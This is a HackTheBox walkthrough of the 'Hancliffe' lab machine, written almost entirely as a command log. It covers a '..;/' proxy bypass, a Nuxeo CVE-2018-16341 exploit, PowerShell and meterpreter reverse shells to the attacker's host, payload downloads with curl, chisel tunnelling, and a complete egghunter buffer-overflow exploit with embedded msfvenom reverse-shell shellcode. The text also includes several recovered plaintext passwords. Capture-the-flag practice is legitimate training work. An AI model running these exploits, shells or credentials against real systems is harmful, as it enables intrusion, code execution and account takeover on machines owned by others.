
HackTheBox – Hancliffe Walkthrough – In English

┌──(root💀kali)-[/home/kali/Downloads]

└─# nmap -A 10.10.11.115

http://10.10.11.115/

http://10.10.11.115:8000

┌──(root💀kali)-[/home/kali/Downloads]

└─# cat /etc/hosts | grep 10.10.11.115

┌──(root💀kali)-[/home/kali/Downloads]

└─# gobuster dir -u hancliffe.htb -w /usr/share/wordlists/dirb/common.txt -b 404

http://hancliffe.htb/maintenance

https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/raft-small-files.txt

┌──(root💀kali)-[/home/kali/Downloads]

└─# gobuster dir -u hancliffe.htb/maintenance -w /opt/SecLists/Discovery/Web-Content/raft-small-files.txt -b 404,502

┌──(root💀kali)-[/home/kali/Downloads]

└─# ffuf -u "http://10.10.11.115/maintenance/..;/FUZZ" -mc 200 -w /home/kali/Downloads/SecLists/Discovery/Web-Content/raft-small-files.txt

http://hancliffe.htb/maintenance/..;/home.html

http://hancliffe.htb/maintenance/..;/login.jsp
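Why the `..;/` trick works: the proxy in front (the 502s gobuster had to filter point to a reverse proxy) matches the raw request path against its rules, and `..;` is not a `..` segment to it, so `/maintenance/..;/login.jsp` still appears to live under `/maintenance/` and is forwarded. The Java servlet container behind it (Nuxeo runs on Tomcat) strips `;`-delimited path parameters from every segment before resolving dot segments, so it ends up serving `/login.jsp`. The Python model below is an added illustration written for this page, not code from the writeup, nginx or Tomcat; the single allowed prefix `/maintenance` is an assumed routing policy, and both normalisers are approximations (nginx also percent-decodes and merges slashes, which is omitted here).

```python
def remove_dot_segments(path: str) -> str:
    """RFC 3986 dot-segment removal: resolves '.' and '..' and drops empty
    segments. This is what a reverse proxy does to the raw URI before
    matching it against its location rules."""
    out = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def servlet_normalize(path: str) -> str:
    """Approximation of how a Java servlet container (Tomcat, which Nuxeo
    runs on) canonicalises a request path: path parameters introduced by ';'
    (e.g. ';jsessionid=...') are stripped from every segment FIRST, so the
    segment '..;' becomes '..' and is then resolved like any other '..'."""
    stripped = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    return remove_dot_segments(stripped)


# Assumed routing policy for this illustration: only /maintenance is meant to
# be reachable through the proxy; everything else must be blocked.
ALLOWED_PREFIX = "/maintenance"


def _under_allowed_prefix(canonical: str) -> bool:
    return canonical == ALLOWED_PREFIX or canonical.startswith(ALLOWED_PREFIX + "/")


def naive_proxy_route(raw_path: str) -> str:
    """Proxy that matches on its own normalisation only. '..;' is not a '..'
    segment to it, so the request still looks like it lives under
    /maintenance/ and is forwarded to the backend."""
    return "backend" if _under_allowed_prefix(remove_dot_segments(raw_path)) else "denied"


def hardened_proxy_route(raw_path: str) -> str:
    """Fix: refuse path parameters outright (they have no legitimate use here)
    and match on the same canonical form the backend will compute."""
    if ";" in raw_path:
        return "denied"
    return "backend" if _under_allowed_prefix(servlet_normalize(raw_path)) else "denied"


def trace(raw_path: str) -> dict:
    """What each hop decides for one request."""
    return {
        "raw": raw_path,
        "naive_proxy": naive_proxy_route(raw_path),
        "backend_serves": servlet_normalize(raw_path),
        "hardened_proxy": hardened_proxy_route(raw_path),
    }


if __name__ == "__main__":
    for p in ("/login.jsp", "/maintenance/../login.jsp", "/maintenance/..;/login.jsp"):
        print(trace(p))
```

Compare the `naive_proxy` and `backend_serves` fields for the `..;` request: the proxy forwards it, while the backend serves a path the proxy believed it had blocked. A plain `/maintenance/../login.jsp` is caught, because the proxy does resolve real `..` segments. The hardened variant agrees with the backend by canonicalising the same way and rejecting path parameters.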

┌──(root💀kali)-[/home/kali/Downloads]

└─# searchsploit Nuxeo

https://github.com/mpgn/CVE-2018-16341

┌──(root💀kali)-[/home/kali/Downloads]

└─# git clone https://github.com/mpgn/CVE-2018-16341.git 

https://gist.githubusercontent.com/HSNHK/c2035b1f22e886dd9cf4dc704a30f489/raw/625cba59adce12fa6a9d6bf507c00de56d88c95c/Hancliffe-CVE-2018%E2%80%9316341.py

┌──(root💀kali)-[/home/kali/Downloads/CVE-2018-16341]

└─# python3 ./CVE-2018-16341.py

command (WIN)> whoami

https://www.revshells.com/

┌──(root💀kali)-[/home/kali/Downloads]

└─# nc -lvnp 1234

As you can see, we now have a shell as 'svc_account'. It is not an interactive shell, just a PoC that runs one command at a time. It is enough, however, to launch a proper PowerShell reverse shell: generate a base64-encoded PowerShell payload (revshells offers it as "PowerShell #3 (Base64)"), start a listener with nc, and run the payload through the PoC.

PS C:\Nuxeo> whoami

https://github.com/carlospolop/PEASS-ng/releases/tag/refs/pull/253/merge

┌──(root💀kali)-[/home/kali/Downloads]

└─# python3 -m http.server 8000

PS C:\Nuxeo> curl 10.10.14.4:8000/winPEASx64.exe -o winPEASx641.exe

PS C:\Nuxeo> .\winPEASx641.exe

winPEAS prints a great deal of information. Among the listening services it enumerates, the one on TCP port 9512 is Unified Remote, whose server has a public remote code execution exploit (searched for next).

┌──(root💀kali)-[/home/kali/Downloads]

└─# searchsploit 'unified remote 3'

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > use payload/windows/x64/meterpreter/reverse_tcp

msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 10.10.14.4

msf6 payload(windows/x64/meterpreter/reverse_tcp) > show options

msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -f exe -o reverse.exe

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost 10.10.14.4

msf6 exploit(multi/handler) > exploit

PS C:\Nuxeo> curl 10.10.14.4:8000/reverse.exe -o rev.exe

PS C:\Nuxeo> .\rev.exe

meterpreter > getuid

meterpreter > portfwd add -l 9512 -p 9512 -r 10.10.11.115

┌──(root💀kali)-[/home/kali/Downloads]

└─# netstat -nlpt

meterpreter > background

Background the session and start the handler again, so it catches the second shell that the Unified Remote exploit will spawn:

msf6 exploit(multi/handler) > exploit

┌──(root💀kali)-[/home/kali/Downloads]

└─# locate 49587.py

┌──(root💀kali)-[/home/kali/Downloads]

└─# python3 -m http.server 80

┌──(root💀kali)-[/home/kali/Downloads]

└─# python2 49587.py 127.0.0.1 10.10.14.4 reverse.exe

Through the meterpreter port forward, 127.0.0.1:9512 is the target's Unified Remote server; the exploit drives it to fetch reverse.exe from our web server on port 80 and execute it, which lands a second meterpreter session, this time as clara.

meterpreter > getuid

meterpreter > pwd

meterpreter > cd Desktop

meterpreter > dir

meterpreter > cat user.txt

PS C:\Users\clara> curl 10.10.14.102:80/winPEASx64.exe -o win64.exe

PS C:\Users\clara> .\win64.exe

Among the winPEAS findings is a stored credential for the application on localhost:8000:

Url:      http://localhost:8000
Username: hancliffe.htb
Password: #@H@ncLiff3D3velopm3ntM@st3rK3y*!

http://10.10.11.115:8000/

Submitting those values to the application on port 8000 yields the generated password AMl.q2DHp?2.C/V0kNFU, which is the password of the local user 'development'.

PS C:\Users\clara> curl 10.10.14.102:80/chisel.exe -o chisel.exe

┌──(root💀kali)-[/home/kali/Downloads]

└─# ./chisel server -p 8000 --reverse

PS C:\Users\clara> .\chisel.exe client 10.10.14.102:8000 R:5985:127.0.0.1:5985

┌──(root💀kali)-[/home/kali/Downloads]

└─# evil-winrm -i 127.0.0.1 -u development -p 'AMl.q2DHp?2.C/V0kNFU'

*Evil-WinRM* PS C:\Users\development\Documents> whoami

*Evil-WinRM* PS C:\Users\development\Documents> cd ..

*Evil-WinRM* PS C:\Users\development> cd ..

*Evil-WinRM* PS C:\Users> cd ..

┌──(root💀kali)-[/home/kali/Downloads]

└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.102 LPORT=7575 -b "\x00" EXITFUNC=thread -f python

Output: the encoded shellcode as a Python `buf` byte string, identical to the `buf` block embedded in Exploit.py below (so it is not reproduced here).

Reference Link: https://7rocky.github.io/en/htb/hancliffe/

Exploit.py (adapted from the reference above; the shellcode embedded below was generated for LHOST=10.10.14.74, as its comment records, so regenerate it with msfvenom for your own address before running):

from pwn import *

io = remote('hancliffe.htb', 9999)

offset     = 66                  # bytes from the start of our input to the saved return address

jmp_eax    = p32(0x719023b3)     # address of a 'jmp eax' gadget; eax points at the start of our input

# Egghunter. Starts with 'sub sp, 0x150' so its own stack use does not clobber
# the buffer, then scans memory for the tag 'w00tw00t' and jumps to the bytes after it.
egghunter = (b"\x66\x81\xEC\x50\x01\x33\xd2\x66\x81\xca\xff\x0f\x33\xdb\x42\x53\x53\x52\x53\x53"
             b"\x53\x6a\x29\x58\xb3\xc0\x64\xff\x13\x83\xc4\x0c\x5a\x83\xc4\x08"
             b"\x3c\x05\x74\xdf\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xda\xaf\x75"
             b"\xd7\xff\xe7")

# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.74 LPORT=7575 -b "\x00" EXITFUNC=thread -f python
buf =  b""
buf += b"\xd9\xcb\xd9\x74\x24\xf4\xbb\xd3\x47\x73\xbc\x5d\x31"
buf += b"\xc9\xb1\x52\x31\x5d\x17\x83\xed\xfc\x03\x8e\x54\x91"
buf += b"\x49\xcc\xb3\xd7\xb2\x2c\x44\xb8\x3b\xc9\x75\xf8\x58"
buf += b"\x9a\x26\xc8\x2b\xce\xca\xa3\x7e\xfa\x59\xc1\x56\x0d"
buf += b"\xe9\x6c\x81\x20\xea\xdd\xf1\x23\x68\x1c\x26\x83\x51"
buf += b"\xef\x3b\xc2\x96\x12\xb1\x96\x4f\x58\x64\x06\xfb\x14"
buf += b"\xb5\xad\xb7\xb9\xbd\x52\x0f\xbb\xec\xc5\x1b\xe2\x2e"
buf += b"\xe4\xc8\x9e\x66\xfe\x0d\x9a\x31\x75\xe5\x50\xc0\x5f"
buf += b"\x37\x98\x6f\x9e\xf7\x6b\x71\xe7\x30\x94\x04\x11\x43"
buf += b"\x29\x1f\xe6\x39\xf5\xaa\xfc\x9a\x7e\x0c\xd8\x1b\x52"
buf += b"\xcb\xab\x10\x1f\x9f\xf3\x34\x9e\x4c\x88\x41\x2b\x73"
buf += b"\x5e\xc0\x6f\x50\x7a\x88\x34\xf9\xdb\x74\x9a\x06\x3b"
buf += b"\xd7\x43\xa3\x30\xfa\x90\xde\x1b\x93\x55\xd3\xa3\x63"
buf += b"\xf2\x64\xd0\x51\x5d\xdf\x7e\xda\x16\xf9\x79\x1d\x0d"
buf += b"\xbd\x15\xe0\xae\xbe\x3c\x27\xfa\xee\x56\x8e\x83\x64"
buf += b"\xa6\x2f\x56\x2a\xf6\x9f\x09\x8b\xa6\x5f\xfa\x63\xac"
buf += b"\x6f\x25\x93\xcf\xa5\x4e\x3e\x2a\x2e\x7b\xb5\x3a\xc8"
buf += b"\x13\xcb\x42\x09\x73\x42\xa4\x5b\x6b\x03\x7f\xf4\x12"
buf += b"\x0e\x0b\x65\xda\x84\x76\xa5\x50\x2b\x87\x68\x91\x46"
buf += b"\x9b\x1d\x51\x1d\xc1\x88\x6e\x8b\x6d\x56\xfc\x50\x6d"
buf += b"\x11\x1d\xcf\x3a\x76\xd3\x06\xae\x6a\x4a\xb1\xcc\x76"
buf += b"\x0a\xfa\x54\xad\xef\x05\x55\x20\x4b\x22\x45\xfc\x54"
buf += b"\x6e\x31\x50\x03\x38\xef\x16\xfd\x8a\x59\xc1\x52\x45"
buf += b"\x0d\x94\x98\x56\x4b\x99\xf4\x20\xb3\x28\xa1\x74\xcc"
buf += b"\x85\x25\x71\xb5\xfb\xd5\x7e\x6c\xb8\xf6\x9c\xa4\xb5"
buf += b"\x9e\x38\x2d\x74\xc3\xba\x98\xbb\xfa\x38\x28\x44\xf9"
buf += b"\x21\x59\x41\x45\xe6\xb2\x3b\xd6\x83\xb4\xe8\xd7\x81"

payload  = b''
payload += egghunter                                # runs first, once 'jmp eax' lands at the start of our input
payload += b'\x90' * (offset - len(egghunter))      # pad up to the saved return address
payload += jmp_eax                                  # overwrite the saved return address
payload += b'\x90' * 50                             # spacer
payload += b'w00tw00t'                              # egg tag the hunter searches for
payload += buf                                      # shellcode sits right after the egg

io.sendlineafter(b'Username: ', b'alfiansyah')
io.sendlineafter(b'Password: ', b'K3r4j@@nM4j@pAh!T')
io.sendlineafter(b'FullName: ', b'what ever')
io.sendlineafter(b'Input Your Code: ', payload)
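The buffer layout above is easy to get wrong by a byte, and the exploit relies on several things silently: the egghunter must fit below the saved return address, the return address must sit exactly at `offset`, the egg tag must appear exactly once, and no byte of the shellcode may be in the set passed to msfvenom with `-b`. The Python helper below is an added example written for this page (not the writeup's code nor the referenced exploit's): it rebuilds the same layout from named parts with each constraint checked, and shows how an offset like 66 is determined in the first place with a Metasploit-style cyclic pattern (pwntools' `cyclic()`/`cyclic_find()` do the same job). The egghunter bytes and the `jmp eax` address are taken from the exploit above; the shellcode is a constructed placeholder standing in for the msfvenom `buf`.

```python
import itertools
import string
import struct

# Taken from the exploit above (not constructed): the egghunter and the
# 'jmp eax' gadget address.
EGGHUNTER = (
    b"\x66\x81\xEC\x50\x01\x33\xd2\x66\x81\xca\xff\x0f\x33\xdb\x42\x53\x53\x52\x53\x53"
    b"\x53\x6a\x29\x58\xb3\xc0\x64\xff\x13\x83\xc4\x0c\x5a\x83\xc4\x08"
    b"\x3c\x05\x74\xdf\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xda\xaf\x75"
    b"\xd7\xff\xe7"
)
JMP_EAX = 0x719023B3
EGG = b"w00tw00t"     # two copies of the 4-byte tag ('w00t' = 0x74303077) the hunter compares against
BADCHARS = b"\x00"    # what the msfvenom command above excluded with -b


def pattern_create(length: int) -> bytes:
    """Metasploit pattern_create: 'Aa0Aa1...'; every 4-byte window is unique
    within the first 20280 bytes, so the dword that lands in EIP maps to one offset."""
    triplets = itertools.product(string.ascii_uppercase, string.ascii_lowercase, string.digits)
    return b"".join("".join(t).encode() for t in itertools.islice(triplets, length // 3 + 1))[:length]


def pattern_offset(pattern: bytes, eip: int) -> int:
    """Metasploit pattern_offset: EIP holds the dword read little-endian from
    the pattern, so repack it the same way and search for it."""
    idx = pattern.find(struct.pack("<I", eip))
    if idx < 0:
        raise ValueError("EIP value is not from the pattern")
    return idx


def has_badchars(data: bytes, badchars: bytes = BADCHARS) -> bool:
    return any(b in badchars for b in data)


def build_payload(offset: int, egghunter: bytes, ret_addr: int, shellcode: bytes,
                  egg: bytes = EGG, sled: int = 50, badchars: bytes = BADCHARS) -> bytes:
    """Same layout as the exploit: hunter, NOP pad to the saved return address,
    'jmp eax' (eax points at our input, so the hunter runs), spacer, egg, shellcode.
    Every constraint the exploit relies on is checked instead of assumed."""
    ret = struct.pack("<I", ret_addr)
    if len(egghunter) > offset:
        raise ValueError(f"egghunter ({len(egghunter)} B) does not fit in the {offset} bytes before EIP")
    for name, part in (("egghunter", egghunter), ("return address", ret), ("shellcode", shellcode)):
        if has_badchars(part, badchars):
            raise ValueError(f"{name} contains a bad character")
    payload = egghunter + b"\x90" * (offset - len(egghunter)) + ret + b"\x90" * sled + egg + shellcode
    if payload[offset:offset + 4] != ret:
        raise AssertionError("return address is not at the expected offset")
    if payload.count(egg) != 1:
        raise ValueError("egg must appear exactly once, or the hunter may jump to the wrong place")
    return payload


if __name__ == "__main__":
    # Constructed placeholder shellcode (int3 instructions) standing in for the msfvenom buf.
    demo_shellcode = b"\xcc" * 32
    pat = pattern_create(300)
    crash_eip = struct.unpack("<I", pat[66:70])[0]      # the value a debugger would show in EIP
    print("offset:", pattern_offset(pat, crash_eip))
    print("payload length:", len(build_payload(66, EGGHUNTER, JMP_EAX, demo_shellcode)))
```

Swap `demo_shellcode` for the real `buf` and `build_payload` will refuse to produce anything if a regenerated shellcode happens to contain `\x00`, which is exactly the kind of failure that otherwise shows up only as a shell that never arrives.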

┌──(root💀kali)-[/home/kali/Downloads]

└─# nc -lvnp 7575

┌──(root💀kali)-[/home/kali/Downloads]

└─# python3 exploit.py

C:\Windows\system32>cd ..

C:\Windows>cd ..

C:\>cd Users

C:\Users>cd Administrator

C:\Users\Administrator>cd Desktop

C:\Users\Administrator\Desktop>type root.txt


Hi, I’m saksham dixit
